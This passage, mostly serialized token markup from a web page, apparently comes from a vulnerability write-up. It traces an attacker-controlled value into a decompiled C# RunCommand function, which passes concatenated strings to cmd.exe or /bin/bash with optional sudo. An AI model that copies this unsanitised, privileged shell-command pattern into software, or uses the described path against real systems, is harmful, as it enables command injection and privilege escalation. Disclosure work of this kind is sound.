??",[1373,16896,16579],{"class":1387},[1373,16898,4912],{"class":1383},[1373,16900,16901,16903,16905,16907,16909,16911,16913,16915],{"class":1375,"line":4798},[1373,16902,9793],{"class":4636},[1373,16904,4641],{"class":1383},[1373,16906,15752],{"class":1397},[1373,16908,59],{"class":1383},[1373,16910,16609],{"class":7297},[1373,16912,1384],{"class":1383},[1373,16914,1359],{"class":4640},[1373,16916,16761],{"class":1383},[1373,16918,16919],{"class":1375,"line":4806},[1373,16920,9814],{"class":1383},[1373,16922,16923,16926,16928,16930,16932,16934,16936,16938,16940,16942,16944,16947,16949,16951],{"class":1375,"line":4817},[1373,16924,16925],{"class":4640}," text ",[1373,16927,5417],{"class":1397},[1373,16929,16839],{"class":1383},[1373,16931,16842],{"class":4640},[1373,16933,15677],{"class":1397},[1373,16935,15680],{"class":7054},[1373,16937,2230],{"class":1383},[1373,16939,16851],{"class":1397},[1373,16941,16813],{"class":4640},[1373,16943,59],{"class":1383},[1373,16945,16946],{"class":4640},"PrimaryServer ",[1373,16948,4606],{"class":1397},[1373,16950,15680],{"class":7054},[1373,16952,4680],{"class":1383},[1373,16954,16955],{"class":1375,"line":4825},[1373,16956,9832],{"class":1383},[1373,16958,16959,16961,16963,16965,16967,16969,16971,16973,16975],{"class":1375,"line":4835},[1373,16960,15381],{"class":1397},[1373,16962,15410],{"class":9372},[1373,16964,8575],{"class":1397},[1373,16966,15159],{"class":4640},[1373,16968,59],{"class":1383},[1373,16970,15164],{"class":4640},[1373,16972,59],{"class":1383},[1373,16974,15169],{"class":4640},[1373,16976,4912],{"class":1383},[1373,16978,16979,16981,16983,16985,16987,16989,16991,16994],{"class":1375,"line":4843},[1373,16980,9793],{"class":4636},[1373,16982,4641],{"class":1383},[1373,16984,15752],{"class":1397},[1373,16986,59],{"class":1383},[1373,16988,16609],{"class":7297},[1373,16990,1384],{"class":1383},[1373,16992,16993],{"class":4640},"text2",[1373,16995,16761],{"class":1383},[1373,16997,16998],{"class":1375,"line":4849},[1373,16999,9814],{"class":1383},[1373,17001,17002,17005,17007,17010,17012,17015],{"class":1375,"line":4877},[1373,17003,17004],{"class":4640}," text2 ",[1373,17006,5417],{"class":1397},[1373,17008,17009],{"class":4640}," Environment",[1373,17011,59],{"class":1383},[1373,17013,17014],{"class":4640},"MachineName",[1373,17016,4912],{"class":1383},[1373,17018,17019],{"class":1375,"line":4915},[1373,17020,9832],{"class":1383},[1373,17022,17023,17025,17027,17029,17031,17033,17035,17037,17039,17041,17043,17045,17047,17049,17051],{"class":1375,"line":4931},[1373,17024,15381],{"class":1397},[1373,17026,15440],{"class":9372},[1373,17028,8575],{"class":1397},[1373,17030,16839],{"class":1383},[1373,17032,16842],{"class":4640},[1373,17034,15677],{"class":1397},[1373,17036,15680],{"class":7054},[1373,17038,2230],{"class":1383},[1373,17040,16851],{"class":1397},[1373,17042,16813],{"class":4640},[1373,17044,59],{"class":1383},[1373,17046,16946],{"class":4640},[1373,17048,4606],{"class":1397},[1373,17050,15680],{"class":7054},[1373,17052,4680],{"class":1383},[1373,17054,17055,17057,17059,17061,17063,17065,17067,17069],{"class":1375,"line":4947},[1373,17056,9793],{"class":4636},[1373,17058,4641],{"class":1383},[1373,17060,15752],{"class":1397},[1373,17062,59],{"class":1383},[1373,17064,16609],{"class":7297},[1373,17066,1384],{"class":1383},[1373,17068,15531],{"class":4640},[1373,17070,16761],{"class":1383},[1373,17072,17073],{"class":1375,"line":4952},[1373,17074,9814],{"class":1383},[1373,17076,17077,17080,17082,17084,17087,17089],{"class":1375,"line":6776},[1373,17078,17079],{"class":4640}," text3 ",[1373,17081,5417],{"class":1397},[1373,17083,4883],{"class":1387},[1373,17085,17086],{"class":1391},"local",[1373,17088,183],{"class":1387},[1373,17090,4912],{"class":1383},[1373,17092,17093],{"class":1375,"line":6781},[1373,17094,9832],{"class":1383},[1373,17096,17097,17099,17101,17103,17105,17108,17110,17112,17114],{"class":1375,"line":7524},[1373,17098,9793],{"class":4636},[1373,17100,4641],{"class":1383},[1373,17102,7590],{"class":4640},[1373,17104,59],{"class":1383},[1373,17106,17107],{"class":7297},"Contains",[1373,17109,1384],{"class":1383},[1373,17111,1388],{"class":1387},[1373,17113,4713],{"class":1387},[1373,17115,16761],{"class":1383},[1373,17117,17118],{"class":1375,"line":7530},[1373,17119,9814],{"class":1383},[1373,17121,17122,17125,17127,17129,17132,17134,17136,17139,17141,17143,17145,17147],{"class":1375,"line":7546},[1373,17123,17124],{"class":4640}," path ",[1373,17126,5417],{"class":1397},[1373,17128,4883],{"class":1387},[1373,17130,17131],{"class":2326},"\\\"",[1373,17133,183],{"class":1387},[1373,17135,15478],{"class":1397},[1373,17137,17138],{"class":4640}," path ",[1373,17140,15448],{"class":1397},[1373,17142,4883],{"class":1387},[1373,17144,17131],{"class":2326},[1373,17146,183],{"class":1387},[1373,17148,4912],{"class":1383},[1373,17150,17151],{"class":1375,"line":7571},[1373,17152,9832],{"class":1383},[1373,17154,17155,17158,17161,17163,17165,17168,17170,17172,17174,17177],{"class":1375,"line":7598},[1373,17156,17157],{"class":14938}," DefaultInterpolatedStringHandler",[1373,17159,17160],{"class":9372}," defaultInterpolatedStringHandler",[1373,17162,8575],{"class":1397},[1373,17164,15283],{"class":1397},[1373,17166,17167],{"class":14938}," DefaultInterpolatedStringHandler",[1373,17169,1384],{"class":1383},[1373,17171,380],{"class":5467},[1373,17173,5437],{"class":1383},[1373,17175,17176],{"class":5467}," 5",[1373,17178,4680],{"class":1383},[1373,17180,17181,17184,17186,17189,17191,17193],{"class":1375,"line":7615},[1373,17182,17183],{"class":4640}," defaultInterpolatedStringHandler",[1373,17185,59],{"class":1383},[1373,17187,17188],{"class":7297},"AppendFormatted",[1373,17190,1384],{"class":1383},[1373,17192,16758],{"class":4640},[1373,17194,4680],{"class":1383},[1373,17196,17197,17199,17201,17204,17206,17208,17210],{"class":1375,"line":7635},[1373,17198,17183],{"class":4640},[1373,17200,59],{"class":1383},[1373,17202,17203],{"class":7297},"AppendLiteral",[1373,17205,1384],{"class":1383},[1373,17207,183],{"class":1387},[1373,17209,4883],{"class":1387},[1373,17211,4680],{"class":1383},[1373,17213,17214,17216,17218,17220,17222,17224],{"class":1375,"line":7640},[1373,17215,17183],{"class":4640},[1373,17217,59],{"class":1383},[1373,17219,17188],{"class":7297},[1373,17221,1384],{"class":1383},[1373,17223,16993],{"class":4640},[1373,17225,4680],{"class":1383},[1373,17227,17228,17230,17232,17234,17236,17238,17240],{"class":1375,"line":7648},[1373,17229,17183],{"class":4640},[1373,17231,59],{"class":1383},[1373,17233,17203],{"class":7297},[1373,17235,1384],{"class":1383},[1373,17237,183],{"class":1387},[1373,17239,4883],{"class":1387},[1373,17241,4680],{"class":1383},[1373,17243,17244,17246,17248,17250,17252,17254],{"class":1375,"line":7672},[1373,17245,17183],{"class":4640},[1373,17247,59],{"class":1383},[1373,17249,17188],{"class":7297},[1373,17251,1384],{"class":1383},[1373,17253,15531],{"class":4640},[1373,17255,4680],{"class":1383},[1373,17257,17258,17260,17262,17264,17266,17268,17270],{"class":1375,"line":7688},[1373,17259,17183],{"class":4640},[1373,17261,59],{"class":1383},[1373,17263,17203],{"class":7297},[1373,17265,1384],{"class":1383},[1373,17267,183],{"class":1387},[1373,17269,4883],{"class":1387},[1373,17271,4680],{"class":1383},[1373,17273,17274,17276,17278,17280,17282,17284],{"class":1375,"line":7709},[1373,17275,17183],{"class":4640},[1373,17277,59],{"class":1383},[1373,17279,17188],{"class":7297},[1373,17281,1384],{"class":1383},[1373,17283,1359],{"class":4640},[1373,17285,4680],{"class":1383},[1373,17287,17288,17290,17292,17294,17296,17298,17300],{"class":1375,"line":7714},[1373,17289,17183],{"class":4640},[1373,17291,59],{"class":1383},[1373,17293,17203],{"class":7297},[1373,17295,1384],{"class":1383},[1373,17297,183],{"class":1387},[1373,17299,4883],{"class":1387},[1373,17301,4680],{"class":1383},[1373,17303,17304,17306,17308,17310,17312,17314],{"class":1375,"line":7722},[1373,17305,17183],{"class":4640},[1373,17307,59],{"class":1383},[1373,17309,17188],{"class":7297},[1373,17311,1384],{"class":1383},[1373,17313,7590],{"class":4640},[1373,17315,4680],{"class":1383},[1373,17317,17318,17321,17323,17325,17327,17330],{"class":1375,"line":9903},[1373,17319,17320],{"class":4640}," command ",[1373,17322,5417],{"class":1397},[1373,17324,17160],{"class":4640},[1373,17326,59],{"class":1383},[1373,17328,17329],{"class":7297},"ToStringAndClear",[1373,17331,15603],{"class":1383},[1373,17333,17334,17336,17338,17340,17342,17344,17347,17349,17351,17353],{"class":1375,"line":9908},[1373,17335,16454],{"class":4640},[1373,17337,59],{"class":1383},[1373,17339,16775],{"class":7297},[1373,17341,1384],{"class":1383},[1373,17343,183],{"class":1387},[1373,17345,17346],{"class":1391},"Run command (with args): ",[1373,17348,183],{"class":1387},[1373,17350,15478],{"class":1397},[1373,17352,16726],{"class":4640},[1373,17354,4680],{"class":1383},[1373,17356,17357],{"class":1375,"line":9913},[1373,17358,9861],{"class":1383},[1373,17360,17361],{"class":1375,"line":9932},[1373,17362,9866],{"class":4636},[1373,17364,17365],{"class":1375,"line":9937},[1373,17366,9788],{"class":1383},[1373,17368,17369,17371,17373,17375,17377,17379,17382,17384,17386,17388],{"class":1375,"line":9957},[1373,17370,16454],{"class":4640},[1373,17372,59],{"class":1383},[1373,17374,16775],{"class":7297},[1373,17376,1384],{"class":1383},[1373,17378,183],{"class":1387},[1373,17380,17381],{"class":1391},"Run command: ",[1373,17383,183],{"class":1387},[1373,17385,15478],{"class":1397},[1373,17387,16726],{"class":4640},[1373,17389,4680],{"class":1383},[1373,17391,17392],{"class":1375,"line":9962},[1373,17393,9861],{"class":1383},[1373,17395,17396,17399,17401,17403,17405,17407,17409,17411,17413,17416,17418,17420,17423,17425,17427,17429,17432,17434,17437,17439,17441,17443,17445,17447,17449,17452,17454,17456,17458,17461,17463,17465,17467,17470,17473,17476],{"class":1375,"line":15955},[1373,17397,17398],{"class":14938}," ValueTuple",[1373,17400,11852],{"class":1383},[1373,17402,15752],{"class":1397},[1373,17404,5437],{"class":1383},[1373,17406,16303],{"class":1397},[1373,17408,5437],{"class":1383},[1373,17410,15757],{"class":1397},[1373,17412,5384],{"class":1383},[1373,17414,17415],{"class":9372}," valueTuple",[1373,17417,8575],{"class":1397},[1373,17419,15116],{"class":1397},[1373,17421,17422],{"class":4640}," CommandLine",[1373,17424,59],{"class":1383},[1373,17426,16655],{"class":7297},[1373,17428,1384],{"class":1383},[1373,17430,17431],{"class":4640},"FileManager",[1373,17433,59],{"class":1383},[1373,17435,17436],{"class":4640},"ApplicationDataPath",[1373,17438,5437],{"class":1383},[1373,17440,16726],{"class":4640},[1373,17442,5437],{"class":1383},[1373,17444,16311],{"class":14985},[1373,17446,5437],{"class":1383},[1373,17448,15283],{"class":1397},[1373,17450,17451],{"class":14938}," Action",[1373,17453,11852],{"class":1383},[1373,17455,15752],{"class":1397},[1373,17457,15660],{"class":1383},[1373,17459,17460],{"class":4640},"MountConfiguration.",[1373,17462,11852],{"class":1397},[1373,17464,16655],{"class":4640},[1373,17466,5384],{"class":1397},[1373,17468,17469],{"class":4640},"g__ProcessCommandOutput",[1373,17471,17472],{"class":1397},"|",[1373,17474,17475],{"class":5467},"23_0",[1373,17477,1413],{"class":1383},[1373,17479,17480,17482,17484,17486,17488,17490,17492,17494,17496,17499,17501,17503],{"class":1375,"line":16030},[1373,17481,17398],{"class":14938},[1373,17483,11852],{"class":1383},[1373,17485,15752],{"class":1397},[1373,17487,5437],{"class":1383},[1373,17489,16303],{"class":1397},[1373,17491,5437],{"class":1383},[1373,17493,15757],{"class":1397},[1373,17495,5384],{"class":1383},[1373,17497,17498],{"class":9372}," valueTuple2",[1373,17500,8575],{"class":1397},[1373,17502,17415],{"class":4640},[1373,17504,4912],{"class":1383},[1373,17506,17507,17509,17511,17513,17516,17518,17521],{"class":1375,"line":16035},[1373,17508,9773],{"class":4636},[1373,17510,4641],{"class":1383},[1373,17512,16090],{"class":1397},[1373,17514,17515],{"class":4640},"valueTuple2",[1373,17517,59],{"class":1383},[1373,17519,17520],{"class":4640},"Item2",[1373,17522,11875],{"class":1383},[1373,17524,17525],{"class":1375,"line":16083},[1373,17526,9788],{"class":1383},[1373,17528,17529,17532,17534,17536,17538,17540,17543,17545,17547,17549,17551,17553,17555,17557,17559,17561,17563,17565,17568],{"class":1375,"line":16098},[1373,17530,17531],{"class":4636}," throw",[1373,17533,15283],{"class":1397},[1373,17535,16530],{"class":14938},[1373,17537,1384],{"class":1383},[1373,17539,183],{"class":1387},[1373,17541,17542],{"class":1391},"Process exited with error Mount: ",[1373,17544,183],{"class":1387},[1373,17546,15478],{"class":1397},[1373,17548,17138],{"class":4640},[1373,17550,15448],{"class":1397},[1373,17552,4883],{"class":1387},[1373,17554,1246],{"class":1391},[1373,17556,8943],{"class":2326},[1373,17558,4883],{"class":1387},[1373,17560,15478],{"class":1397},[1373,17562,17498],{"class":4640},[1373,17564,59],{"class":1383},[1373,17566,17567],{"class":4640},"Item1",[1373,17569,4680],{"class":1383},[1373,17571,17572],{"class":1375,"line":16103},[1373,17573,9861],{"class":1383},[1373,17575,17576],{"class":1375,"line":16147},[1373,17577,4795],{"class":1383},[1373,17579,17580],{"class":1375,"line":16153},[1373,17581,1855],{"class":1383},[18,17583,17584,17585,17587,17588,17591],{},"Finally, the attacker-controlled value hits the ",[886,17586,16655],{}," function; that function then calls ",[886,17589,17590],{},"Process"," with attacker-controlled values and will also escalate privileges on Linux platforms:",[1354,17593,17595],{"className":14927,"code":17594,"language":14929,"meta":219,"style":219},"[NullableContext(1)]\n[return: TupleElementNames(new string[] { \"result\", \"success\", \"cmd\" })]\n[return: Nullable(new byte[] { 1, 0, 1, 1 })]\npublic static async Task\u003CValueTuple\u003Cstring, bool, string>> RunCommand(string currentDir, string command, bool sudo = false, Action\u003Cstring> processOutputLine = null)\n{\n string ranCmd = string.Empty;\n if (string.IsNullOrWhiteSpace(currentDir))\n {\n currentDir = AppDomain.CurrentDomain.BaseDirectory;\n }\n if (CommandLine.IsDocker)\n {\n sudo = false;\n }\n ProcessStartInfo processStartInfo = new ProcessStartInfo\n {\n FileName = (OperatingSystem.IsWindows() ? \"cmd.exe\" : \"\u002Fbin\u002Fbash\"),\n Arguments = (OperatingSystem.IsWindows() ? (\"\u002Fc \" + command) : (\"-c \\\"\" + (sudo ? \"sudo \" : \"\") + command + \"\\\"\")),\n RedirectStandardOutput = true,\n RedirectStandardError = true,\n UseShellExecute = false,\n CreateNoWindow = true,\n WorkingDirectory = currentDir\n };\n ranCmd = processStartInfo.FileName + \" \" + processStartInfo.Arguments;\n StringBuilder resultSb = new StringBuilder();\n bool flag = false;\n using (Process process = new Process\n {\n StartInfo = processStartInfo\n })\n {\n process.OutputDataReceived += delegate(object sender, DataReceivedEventArgs args)\n {\n if (!string.IsNullOrEmpty(args.Data))\n {\n resultSb.AppendLine(args.Data);\n Action\u003Cstring> processOutputLine5 = processOutputLine;\n if (processOutputLine5 == null)\n {\n return;\n }\n processOutputLine5(args.Data);\n }\n };\n process.ErrorDataReceived += delegate(object sender, DataReceivedEventArgs args)\n {\n if (!string.IsNullOrEmpty(args.Data))\n {\n resultSb.AppendLine(args.Data);\n Action\u003Cstring> processOutputLine6 = processOutputLine;\n if (processOutputLine6 == null)\n {\n return;\n }\n processOutputLine6(args.Data);\n }\n };\n try\n {\n process.Start();\n process.BeginOutputReadLine();\n process.BeginErrorReadLine();\n Action\u003Cstring> processOutputLine2 = processOutputLine;\n if (processOutputLine2 != null)\n {\n processOutputLine2(\"Waiting for process to exit.\");\n }\n await process.WaitForExitAsync(default(CancellationToken));\n flag = process.ExitCode == 0;\n DefaultInterpolatedStringHandler defaultInterpolatedStringHandler = new DefaultInterpolatedStringHandler(19, 1);\n defaultInterpolatedStringHandler.AppendLiteral(\"Process exit code: \");\n defaultInterpolatedStringHandler.AppendFormatted\u003Cint>(process.ExitCode);\n string text = defaultInterpolatedStringHandler.ToStringAndClear();\n Action\u003Cstring> processOutputLine3 = processOutputLine;\n if (processOutputLine3 != null)\n {\n processOutputLine3(text);\n }\n text = \"Process Command: \" + ranCmd;\n Action\u003Cstring> processOutputLine4 = processOutputLine;\n if (processOutputLine4 != null)\n {\n processOutputLine4(text);\n }\n }\n catch (Exception ex)\n {\n return new ValueTuple\u003Cstring, bool, string>(ex.ToString(), false, ranCmd);\n }\n }\n Process process = null;\n return new ValueTuple\u003Cstring, bool, string>(resultSb.ToString(), flag, ranCmd);\n}\n\n}\n",[886,17596,17597,17610,17659,17697,17771,17775,17792,17811,17815,17837,17841,17857,17861,17872,17876,17891,17895,17934,18018,18029,18040,18051,18062,18072,18077,18108,18125,18139,18157,18161,18171,18176,18180,18214,18218,18245,18249,18269,18289,18305,18309,18316,18321,18336,18340,18345,18372,18376,18400,18404,18422,18441,18456,18460,18466,18470,18485,18489,18493,18497,18502,18515,18527,18539,18560,18576,18581,18598,18603,18628,18649,18672,18692,18718,18735,18755,18771,18776,18788,18793,18814,18834,18850,18855,18867,18872,18877,18892,18897,18938,18943,18948,18962,19002,19007,19012],{"__ignoreMap":219},[1373,17598,17599,17601,17604,17606,17608],{"class":1375,"line":1376},[1373,17600,7035],{"class":1383},[1373,17602,17603],{"class":14938},"NullableContext",[1373,17605,1384],{"class":1383},[1373,17607,467],{"class":5467},[1373,17609,14951],{"class":1383},[1373,17611,17612,17614,17617,17619,17622,17624,17626,17628,17630,17632,17634,17637,17639,17641,17643,17645,17647,17649,17651,17654,17656],{"class":1375,"line":220},[1373,17613,7035],{"class":1383},[1373,17615,17616],{"class":5387},"return",[1373,17618,4606],{"class":1383},[1373,17620,17621],{"class":14938}," TupleElementNames",[1373,17623,1384],{"class":1383},[1373,17625,15523],{"class":1397},[1373,17627,15757],{"class":1397},[1373,17629,7124],{"class":1383},[1373,17631,5420],{"class":1383},[1373,17633,4883],{"class":1387},[1373,17635,17636],{"class":1391},"result",[1373,17638,183],{"class":1387},[1373,17640,5437],{"class":1383},[1373,17642,4883],{"class":1387},[1373,17644,16142],{"class":1391},[1373,17646,183],{"class":1387},[1373,17648,5437],{"class":1383},[1373,17650,4883],{"class":1387},[1373,17652,17653],{"class":1391},"cmd",[1373,17655,183],{"class":1387},[1373,17657,17658],{"class":1383}," })]\n",[1373,17660,17661,17663,17665,17667,17670,17672,17674,17677,17679,17681,17683,17685,17687,17689,17691,17693,17695],{"class":1375,"line":1266},[1373,17662,7035],{"class":1383},[1373,17664,17616],{"class":5387},[1373,17666,4606],{"class":1383},[1373,17668,17669],{"class":14938}," Nullable",[1373,17671,1384],{"class":1383},[1373,17673,15523],{"class":1397},[1373,17675,17676],{"class":1397}," byte",[1373,17678,7124],{"class":1383},[1373,17680,5420],{"class":1383},[1373,17682,5468],{"class":5467},[1373,17684,5437],{"class":1383},[1373,17686,5557],{"class":5467},[1373,17688,5437],{"class":1383},[1373,17690,5468],{"class":5467},[1373,17692,5437],{"class":1383},[1373,17694,5468],{"class":5467},[1373,17696,17658],{"class":1383},[1373,17698,17699,17701,17703,17705,17707,17709,17712,17714,17716,17718,17720,17722,17724,17726,17728,17730,17732,17735,17737,17739,17741,17743,17745,17748,17750,17752,17754,17756,17758,17760,17762,17765,17767,17769],{"class":1375,"line":1852},[1373,17700,15019],{"class":4652},[1373,17702,15232],{"class":4652},[1373,17704,15022],{"class":4652},[1373,17706,15025],{"class":14938},[1373,17708,11852],{"class":1383},[1373,17710,17711],{"class":14938},"ValueTuple",[1373,17713,11852],{"class":1383},[1373,17715,15752],{"class":1397},[1373,17717,5437],{"class":1383},[1373,17719,16303],{"class":1397},[1373,17721,5437],{"class":1383},[1373,17723,15757],{"class":1397},[1373,17725,15038],{"class":1383},[1373,17727,16712],{"class":7297},[1373,17729,1384],{"class":1383},[1373,17731,15752],{"class":1397},[1373,17733,17734],{"class":9372}," currentDir",[1373,17736,5437],{"class":1383},[1373,17738,15757],{"class":1397},[1373,17740,16726],{"class":9372},[1373,17742,5437],{"class":1383},[1373,17744,16303],{"class":1397},[1373,17746,17747],{"class":9372}," sudo",[1373,17749,8575],{"class":1397},[1373,17751,16311],{"class":14985},[1373,17753,5437],{"class":1383},[1373,17755,17451],{"class":14938},[1373,17757,11852],{"class":1383},[1373,17759,15752],{"class":1397},[1373,17761,5384],{"class":1383},[1373,17763,17764],{"class":9372}," processOutputLine",[1373,17766,8575],{"class":1397},[1373,17768,15680],{"class":7054},[1373,17770,11875],{"class":1383},[1373,17772,17773],{"class":1375,"line":4692},[1373,17774,8904],{"class":1383},[1373,17776,17777,17779,17782,17784,17786,17788,17790],{"class":1375,"line":4724},[1373,17778,16322],{"class":1397},[1373,17780,17781],{"class":9372}," ranCmd",[1373,17783,8575],{"class":1397},[1373,17785,15757],{"class":1397},[1373,17787,59],{"class":1383},[1373,17789,15839],{"class":4640},[1373,17791,4912],{"class":1383},[1373,17793,17794,17796,17798,17800,17802,17804,17806,17809],{"class":1375,"line":4756},[1373,17795,4695],{"class":4636},[1373,17797,4641],{"class":1383},[1373,17799,15752],{"class":1397},[1373,17801,59],{"class":1383},[1373,17803,16609],{"class":7297},[1373,17805,1384],{"class":1383},[1373,17807,17808],{"class":4640},"currentDir",[1373,17810,16761],{"class":1383},[1373,17812,17813],{"class":1375,"line":4768},[1373,17814,9613],{"class":1383},[1373,17816,17817,17820,17822,17825,17827,17830,17832,17835],{"class":1375,"line":4792},[1373,17818,17819],{"class":4640}," currentDir ",[1373,17821,5417],{"class":1397},[1373,17823,17824],{"class":4640}," AppDomain",[1373,17826,59],{"class":1383},[1373,17828,17829],{"class":4640},"CurrentDomain",[1373,17831,59],{"class":1383},[1373,17833,17834],{"class":4640},"BaseDirectory",[1373,17836,4912],{"class":1383},[1373,17838,17839],{"class":1375,"line":4798},[1373,17840,4795],{"class":1383},[1373,17842,17843,17845,17847,17850,17852,17855],{"class":1375,"line":4806},[1373,17844,4695],{"class":4636},[1373,17846,4641],{"class":1383},[1373,17848,17849],{"class":4640},"CommandLine",[1373,17851,59],{"class":1383},[1373,17853,17854],{"class":4640},"IsDocker",[1373,17856,11875],{"class":1383},[1373,17858,17859],{"class":1375,"line":4817},[1373,17860,9613],{"class":1383},[1373,17862,17863,17866,17868,17870],{"class":1375,"line":4825},[1373,17864,17865],{"class":4640}," sudo ",[1373,17867,5417],{"class":1397},[1373,17869,16311],{"class":14985},[1373,17871,4912],{"class":1383},[1373,17873,17874],{"class":1375,"line":4835},[1373,17875,4795],{"class":1383},[1373,17877,17878,17881,17884,17886,17888],{"class":1375,"line":4843},[1373,17879,17880],{"class":14938}," ProcessStartInfo",[1373,17882,17883],{"class":9372}," processStartInfo",[1373,17885,8575],{"class":1397},[1373,17887,15283],{"class":1397},[1373,17889,17890],{"class":14938}," ProcessStartInfo\n",[1373,17892,17893],{"class":1375,"line":4849},[1373,17894,9613],{"class":1383},[1373,17896,17897,17900,17902,17904,17907,17909,17912,17914,17916,17918,17920,17922,17924,17926,17929,17931],{"class":1375,"line":4877},[1373,17898,17899],{"class":4640}," FileName ",[1373,17901,5417],{"class":1397},[1373,17903,4641],{"class":1383},[1373,17905,17906],{"class":4640},"OperatingSystem",[1373,17908,59],{"class":1383},[1373,17910,17911],{"class":7297},"IsWindows",[1373,17913,7514],{"class":1383},[1373,17915,16851],{"class":1397},[1373,17917,4883],{"class":1387},[1373,17919,14509],{"class":1391},[1373,17921,183],{"class":1387},[1373,17923,16887],{"class":1397},[1373,17925,4883],{"class":1387},[1373,17927,17928],{"class":1391},"\u002Fbin\u002Fbash",[1373,17930,183],{"class":1387},[1373,17932,17933],{"class":1383},"),\n",[1373,17935,17936,17939,17941,17943,17945,17947,17949,17951,17953,17955,17957,17960,17962,17964,17966,17968,17970,17972,17974,17977,17979,17981,17983,17985,17988,17990,17992,17994,17996,17998,18000,18002,18004,18007,18009,18011,18013,18015],{"class":1375,"line":4915},[1373,17937,17938],{"class":4640}," Arguments ",[1373,17940,5417],{"class":1397},[1373,17942,4641],{"class":1383},[1373,17944,17906],{"class":4640},[1373,17946,59],{"class":1383},[1373,17948,17911],{"class":7297},[1373,17950,7514],{"class":1383},[1373,17952,16851],{"class":1397},[1373,17954,4641],{"class":1383},[1373,17956,183],{"class":1387},[1373,17958,17959],{"class":1391},"\u002Fc ",[1373,17961,183],{"class":1387},[1373,17963,15478],{"class":1397},[1373,17965,16726],{"class":4640},[1373,17967,2230],{"class":1383},[1373,17969,16887],{"class":1397},[1373,17971,4641],{"class":1383},[1373,17973,183],{"class":1387},[1373,17975,17976],{"class":1391},"-c ",[1373,17978,17131],{"class":2326},[1373,17980,183],{"class":1387},[1373,17982,15478],{"class":1397},[1373,17984,4641],{"class":1383},[1373,17986,17987],{"class":4640},"sudo ",[1373,17989,13993],{"class":1397},[1373,17991,4883],{"class":1387},[1373,17993,17987],{"class":1391},[1373,17995,183],{"class":1387},[1373,17997,16887],{"class":1397},[1373,17999,16579],{"class":1387},[1373,18001,2230],{"class":1383},[1373,18003,15478],{"class":1397},[1373,18005,18006],{"class":4640}," command ",[1373,18008,15448],{"class":1397},[1373,18010,4883],{"class":1387},[1373,18012,17131],{"class":2326},[1373,18014,183],{"class":1387},[1373,18016,18017],{"class":1383},")),\n",[1373,18019,18020,18023,18025,18027],{"class":1375,"line":4931},[1373,18021,18022],{"class":4640}," RedirectStandardOutput ",[1373,18024,5417],{"class":1397},[1373,18026,14986],{"class":14985},[1373,18028,9062],{"class":1383},[1373,18030,18031,18034,18036,18038],{"class":1375,"line":4947},[1373,18032,18033],{"class":4640}," RedirectStandardError ",[1373,18035,5417],{"class":1397},[1373,18037,14986],{"class":14985},[1373,18039,9062],{"class":1383},[1373,18041,18042,18045,18047,18049],{"class":1375,"line":4952},[1373,18043,18044],{"class":4640}," UseShellExecute ",[1373,18046,5417],{"class":1397},[1373,18048,16311],{"class":14985},[1373,18050,9062],{"class":1383},[1373,18052,18053,18056,18058,18060],{"class":1375,"line":6776},[1373,18054,18055],{"class":4640}," CreateNoWindow ",[1373,18057,5417],{"class":1397},[1373,18059,14986],{"class":14985},[1373,18061,9062],{"class":1383},[1373,18063,18064,18067,18069],{"class":1375,"line":6781},[1373,18065,18066],{"class":4640}," WorkingDirectory ",[1373,18068,5417],{"class":1397},[1373,18070,18071],{"class":4640}," currentDir\n",[1373,18073,18074],{"class":1375,"line":7524},[1373,18075,18076],{"class":1383}," };\n",[1373,18078,18079,18082,18084,18086,18088,18091,18093,18095,18097,18099,18101,18103,18106],{"class":1375,"line":7530},[1373,18080,18081],{"class":4640}," ranCmd ",[1373,18083,5417],{"class":1397},[1373,18085,17883],{"class":4640},[1373,18087,59],{"class":1383},[1373,18089,18090],{"class":4640},"FileName ",[1373,18092,15448],{"class":1397},[1373,18094,4883],{"class":1387},[1373,18096,4883],{"class":1387},[1373,18098,15478],{"class":1397},[1373,18100,17883],{"class":4640},[1373,18102,59],{"class":1383},[1373,18104,18105],{"class":4640},"Arguments",[1373,18107,4912],{"class":1383},[1373,18109,18110,18113,18116,18118,18120,18123],{"class":1375,"line":7546},[1373,18111,18112],{"class":14938}," StringBuilder",[1373,18114,18115],{"class":9372}," resultSb",[1373,18117,8575],{"class":1397},[1373,18119,15283],{"class":1397},[1373,18121,18122],{"class":14938}," StringBuilder",[1373,18124,15603],{"class":1383},[1373,18126,18127,18130,18133,18135,18137],{"class":1375,"line":7571},[1373,18128,18129],{"class":1397}," bool",[1373,18131,18132],{"class":9372}," flag",[1373,18134,8575],{"class":1397},[1373,18136,16311],{"class":14985},[1373,18138,4912],{"class":1383},[1373,18140,18141,18143,18145,18147,18150,18152,18154],{"class":1375,"line":7598},[1373,18142,15270],{"class":4636},[1373,18144,4641],{"class":1383},[1373,18146,17590],{"class":14938},[1373,18148,18149],{"class":9372}," process",[1373,18151,8575],{"class":1397},[1373,18153,15283],{"class":1397},[1373,18155,18156],{"class":14938}," Process\n",[1373,18158,18159],{"class":1375,"line":7615},[1373,18160,9613],{"class":1383},[1373,18162,18163,18166,18168],{"class":1375,"line":7635},[1373,18164,18165],{"class":4640}," StartInfo ",[1373,18167,5417],{"class":1397},[1373,18169,18170],{"class":4640}," processStartInfo\n",[1373,18172,18173],{"class":1375,"line":7640},[1373,18174,18175],{"class":1383}," })\n",[1373,18177,18178],{"class":1375,"line":7648},[1373,18179,9613],{"class":1383},[1373,18181,18182,18185,18187,18190,18193,18197,18199,18201,18204,18206,18209,18212],{"class":1375,"line":7672},[1373,18183,18184],{"class":4640}," process",[1373,18186,59],{"class":1383},[1373,18188,18189],{"class":4640},"OutputDataReceived ",[1373,18191,18192],{"class":1397},"+=",[1373,18194,18196],{"class":18195},"sQHqT"," delegate",[1373,18198,1384],{"class":1383},[1373,18200,13374],{"class":1397},[1373,18202,18203],{"class":9372}," sender",[1373,18205,5437],{"class":1383},[1373,18207,18208],{"class":14938}," DataReceivedEventArgs",[1373,18210,18211],{"class":9372}," 